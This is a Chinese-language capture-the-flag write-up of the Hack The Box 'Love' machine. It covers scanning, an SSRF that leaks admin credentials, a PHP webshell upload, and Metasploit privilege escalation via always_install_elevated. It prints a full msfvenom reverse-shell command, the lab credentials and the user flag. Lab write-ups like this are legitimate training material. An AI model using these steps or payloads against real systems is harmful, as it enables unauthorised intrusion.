- A+
0x00 前言由于乐少推荐的王牌靶机基本offline,需要氪金,就从简单的开始整吧。HTB:Love

0x01 信息收集
goby扫描(确实快,官方推荐kali,后面将全用nmap)

nmap扫描


这里发现证书里面有个domain,直接访问不行,绑定hosts

发现有一个web

web首页点击DEMO,发现这里有SSRF。localhos 443端口扫描

127.0.0.1:5000 扫描,发现有账号密码 admin: @LoveIsInTheAir!!!!

常规访问443端口https://10.10.10.239/index.php

php 版本7.3.2780端口

尝试用刚刚扫描出来的账号密码登录发现报错目录遍历

这里路径是http://10.10.10.239/admin/遍历的路径,和首页访问登录报错

成功登录后台

0x02 漏洞利用
找到vote list这里可以上传文件位置直接 上传一句话木马(后面发现任何文件都可以上传)

上传的马子可以直接看到路径

访问存在

直接连上蚁剑


查看普通用户flag user.txt e0d85aa9bacab43be35a32182b78f067提交成功

提权基础信息收集查看补丁

使用提权辅助工具

提权辅助工具,需要python环境https://github.com/GDSSecurity/Windows-Exploit-Suggester这里采用美少妇提权,用美少妇内置的提权辅助工具。先将shell转移到美少妇上。生成马子,直接通过上传图片位置上传马子msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.149 LPORT=10086 -f exe -o 1.exe用msf内置提权扫描工具扫描

使用always_install_elevated模块提权到administrator

查看administrator用户flag root.txt

提交成功

0x03 总结
1.信息收集,端口服务要详细,所有存在漏洞点的都细心尝试一遍等
2.考点:nmap扫描、目录遍历、SSRF、文件上传,msf,msf内置提权扫描模块suggester
3.HTB win机器falg一般都放在桌面,或者用find去查找user.txt/root.txt